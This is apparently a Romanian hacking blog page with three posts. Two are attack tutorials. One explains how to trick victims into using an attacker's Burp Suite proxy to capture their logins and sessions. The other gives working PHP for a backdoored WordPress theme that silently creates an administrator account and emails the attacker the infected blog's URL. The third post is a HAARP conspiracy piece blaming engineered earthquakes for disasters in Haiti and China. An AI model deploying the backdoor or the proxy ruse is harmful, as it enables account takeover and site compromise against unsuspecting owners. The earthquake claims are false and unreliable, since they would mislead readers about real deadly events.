26.7.13

Spargerea oricărui cont al unei victime cu ajutorul ingineriei sociale

INTRODUCION

Ok. După cum v-am obişnuit îmi place să aduc câte ceva mai diferit. Astăzi vom discuta despre subiectul: "Cum putem sparge un cont (al unei victime) al oricărui site web cu ajutorul ingineriei sociale". Dar punctul culminant nu este ingineria socială, ci metoda prin care obţinem datele de autentificare în cazul cel mai bun (în plain text) sau putem să ne mulţumim doar cu sesiunea acestuia (care este totodată suficientă pentru a surfa în contul său).

CONCEPT

Care este ideea. Poate că mulţi dintre voi aţi auzit de Burp Suite. Este o platformă scrisă în java, special creată pentru cei care doresc să facă penetration testing. Ce m-a atras la prima vedere? O chestie interesantă legată de proxy. Pe scurt să creăm un server proxy cu ajutorul aplicaţiei prin care vom intercepta traficul victimelor ce folosesc proxy-ul nostru. Adică să facem sniffing, dar de la distanţă.

THE PROOF

Pentru a realiza un exemplu cât mai frumos şi clar, am luat legătura cu 311733 (că era online pe chat-ul unui board de securitate şi dornic să ma ajute) pentru a se pune în postura de victimă. Aşa că am început prin a configura Burp Suite-ul ca în imaginea aceasta. În acest moment mi-am transformat calculatorul într-un server proxy. După ce am convins victima să folosească HTTP proxy-ul în browser-ul său, vom putea să-i interceptăm nestingheriţi traficul ca în imaginea asta sau asta. Vedem sesiunea cu parola encriptată, care sunt mai mult decât necesare pentru a ne îndeplini scopul.

SOCIAL ENGINEERING EXAMPLE

Să presupunem că victima are nevoie urgentă de o metodă care să îi ascundă pentru câteva momente identitatea, aşa că voi îi veţi propune să folosească un HTTP proxy securizat spunându-i că e foarte bun că l-aţi mai folosit şi că aveţi încredere în el. După ce îl va configura, îî interceptaţi conturile (dacă datele de logare către acele site-uri se transmit în plain text), sau ca în pozele de mai devreme, encriptate. Alte scenarii pot fi născocite în câteva minute deoarece nu dă nimic de bănuit, gen: postaţi pe un forum HTTP proxy-ul iar cine îl foloseşte devine victimă. Trimiteţi către un administrator al unui forum un mesaj privat că nu ştiţi dacă aţi configurat bine acel proxy să îl verifice dacă este bun sau trebuie să încercaţi altul s.a.m.d

Sper că vă va fi de folos pe viitor acest tutorial. Baftă.

THE END

Share on:

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

INTRODUCTION


Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi dea seama proprietarul.

Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală.

Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator.

THE CODE

add_action('wp_head', 'wp_wordpress');
      function wp_wordpress() {
                    if ($_GET['p'] == '1') {
                           require('wp-includes/registration.php');
                    if (!username_exists('wordpress')) {
      $user_id = wp_create_user('Guest', 'password');
      $user = new WP_User($user_id);
      $user->set_role('administrator');
        }
    }
} 
Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă.

Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema.

Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email.

THE CODE

<? add_action('wp_head','wp_wordpressmail');
           function wp_wordpressmail(){
                     if ( is_user_logged_in() ) {
                     if(!username_exists('wordpress')){
     $addr='TinKode@domain.tld'; # Aici puneţi adresa voastră de email
     $judul='WP URL';
                   wp_mail($addr,$judul,get_bloginfo('wpurl'));
        }
     }
  }
?> 

Să vă bucuraţi de metodă. Şi ca să nu vă dea de gol adresa de mail, puteţi să o encriptaţi în base64.

Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă.

THE END

Share on:

14.3.13

31.1.13

HAARP | Generating artificial earthquakes


NOTA: Pentru o buna intelegere a materialului, recomand ca anterior acestuia sa fie lecturata prezentarea “Razboiul meteorologic – o realitate de necontestat

Inregistrarile Congresului SUA facute publice au aratat ca exista preocupari certe privind utilizarea HAARP pentru scanarea interioara a continutului Terrei pe adancimi de multi kilometri in vederea localizarii de depozite subterane de munitie, tuneluri si rezerve mineraliere neexploatate inca – operatia fiind denumita “”Earth Penetrating Tomography”. Problema consta in faptul ca frecventa utilizata pentru penetrarea pamantului in profunzime corespunde domeniului de frecvente considerat ca vinovat de producerea de mutatii ireversibile asupra functiilor mentale umane.

Deci, HAARP dirijeaza fascicule cu energii enorme din atmosfera catre Terra, in interiorul planetei noastre. Acest fapt produce intreruperi in campul magnetic propriu al Pamantului, putand cauza cutremure majore. Multe dintre recentele cutremure de mare intensitate din ultima perioada au fost precedate de fenomene de colorare a atmosferei, caracteristice iluminarii cu radiatie HAARP.
In conformitate cu un raport secret al Flotei Militare de Nord a Rusiei, tragicul cutremur din Haiti a fost cauzat de o eroare de utilizare a unei arme de generare a seismelor din dotarea US Navy, in realitate misiunea acesteia avand ca tinta Iranului.

In cazul devastatorului cutremur din China din data de 12 mai 2008, faptele concrete ce pot fi mentionate sau care pot ridica intrebari sunt urmatoarele:
• HAARP si-a incetat activitatea cu circa 8 ore inaintea declansarii cataclismului.
• Cutremurul s-a produs la orele 6:28 UTC in data de 12 mai;
• In minutele anterioare cutremurului au fost raportate o serie de fenomene stranii, inclusiv aparitia unor nori iridiscenti;
• Daca cutremurul este precedat de unde scalare, se poate considera ca acestea sunt cele care-l genereaza? Daca raspunsul este pozitiv, inseamna ca ariile fazate ale diverselor dispozitive de incalzire a atmosferei existente la nivel global sunt capabile sa execute ordine politice si militare.

Cutremurul din 2008 din China a produs pagube care au fost primite cu satisfactie de unii conducatori militari din Emisfera Occidentala si SUA – deoarece:
• un inalt oficial militar chinez a declarat in secret ca seismul din provincia Sichuan a generat o serie de explozii in lant in zona muntilor cu acelasi nume;
• a fost distrus cel mai mare arsenal al armatei, noul poligon de testare si partial facilitatile nucleare, incluzand un numar de capete nucleare - aceasta informatie fiind considerata de autoritatile chineze ca avand caracter strict secret;
• dupa o atenta evaluare a datelor seismice, expertii militari au confirmat ca un soc de alta natura decat geologica s-a produs in epicentrul cutremurului, iar energia eliberata a fost echivalenta cu cea a unei explozii nucleare subterane.

In prezent, chiar si prin insumarea sincronizata a energiei de iesire a tuturor dispozitivelor existente de incalzire a ionosferei nu poate fi generata puterea necesara producerii unui cutremur de proportii pe pamant, dar acest lucru nici nu este necesar in cazul in care acestea opereaza in regim debalansat neliniar, ca declansator sau ca redirectional al unor mari fluxuri energetice naturale.

A fost cutremurul din China un eveniment natural intamplator?  Sau a fost intentionat generat din motive strategice? Puteti lua in consideratie urmatoarele:
• numarul oficial al celor decedati a fost de 80.000;
• HAARP a fost deconectat cu 8 ore inainte de producerea seismului;
• Magnitudinea cutremurului a fost 8,0;
• S-a produs in data de 12 mai (5/12 = 5 + 1 + 2 = 8);
• A avut loc exact cu 88 zile inaintea datei de deschidere a JO de la Beijing;
• JO au fost deschise oficial in data de 8/8/2008 la orele 8:08PM.

Simple coincidente?


Autor: Marius – Eugen Opran
Share on: